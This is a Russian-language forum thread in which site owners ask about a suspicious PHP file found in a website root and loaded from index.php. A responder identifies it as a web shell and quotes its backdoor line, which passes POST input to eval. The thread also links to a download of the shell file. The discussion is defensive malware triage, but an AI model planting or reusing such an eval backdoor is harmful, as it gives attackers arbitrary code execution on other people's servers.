На сайте появился новый файл

Всем привет. У знакомой в корне сайта обнаружил один php-файл, который мне кажется подозрительным по содержанию. Он подключается через индексный файл в самом его начале. Знакомая его сама не загружала. Если скинуть ссылку на скачивание этого файла, то сможете определить является ли он вирусом и какую именно функцию он выполняет? А то айболит его почему-то не определил.

Такая же ситуация.

Залили доры и шелл на сервер с Ispmanager. Как могли сделать? Просмотрел логи FTP и ISPmanager - никакой активности нет.

Сломать через скрипты или сайты не могли, так как файл с правами USER, а php работает от пользователя apache.

Есть мысли?

---------- Добавлено 25.09.2016 в 19:31 ----------

Такая же ситуация.

Залили доры и шелл на сервер с Ispmanager. Как могли сделать? Просмотрел логи FTP и ISPmanager - никакой активности нет.

Сломать через скрипты или сайты не могли, так как файл с правами USER, а php работает от пользователя apache.

Есть мысли?

Ну скиньте. Не посмотрев - не ответить. Только скидывайте так, чтобы не заразить никого. А то устроите тут инфекционное отделение.

Ну вот это совсем лишняя информация. В сети 100500 сайтов, на которые внедрён этот шелл, и информация о пути и содержимом папки с шеллом в CMS - прямое указание для взломщиков. Хозяева взломанных сайтов на этот ресурс не заходят, а вот желающие куда-нибудь влезть его наверняка постоянно мониторят. Через упомянутый шелл возможна волна вторичных взломов, когда вломщики не знают основную уязвимость, но могут воспользоваться опубликованной в этом топике.

Не знаю как это правильно сделать, в в общем там php-файл, я его зазиповал и в хранилище закачал. Ссылка на файл http://dropmefiles.com/p4iT3

В общем, это шелл. Умеет работать с сессиями, исполнять передаваемый произвольный код и обновляться. Написан, правда, с ошибками, поэтому, возможно, частично или полностью нерабочий. А может быть, и рабочий, если ошибки нефатальные - не вникал. В любом случае это дыра.

Спасибо за инфу, если есть возможность, то может скрин скиньте, хоть поглядеть как интрефейс там выглядит )) любопытство распирает. И ещё:

что это означает? Имеете ввиду умеет работать с чужими сессиями?

Как я понял у этого шела есть одна закономерность он лезет в папку modules и там в модуле XXXXX что то делает, снес этот модуль - так как он не используется.

Да нет там никакого интерфейса. Просто выполняет, то что поступает по командам GET и POST. По сессиям там заложена возможность записывать в сессии всё, что в голову взбредёт. Но повторюсь, программа явно недоделана, производит впечатление полуфабриката. Основное, чего там следует бояться:

if( $page == 'cmd' ) { @eval(@$_POST['cmd']); }

Выполняет произвольный код.

Что касается шелла, с которого и началась эта тема, то по моим наблюдениям, для его заливки используется одна и та же уязвимость. Заражено уже очень много сайтов, и процесс продолжается. Пока идёт только тихая подготовка: код заливается и делается проверка работоспособности. Зачем - остаётся только гадать. Не исключено, что в один прекрасный день на всех сайтах одновременно вместо главной страницы появится "красивая" афиша. Или просто снесут весь аккаунт нафиг. Сервер, с которого идут атаки, расположен в Харькове. С учётом непростой международной обстановки можно нафантазировать чего угодно.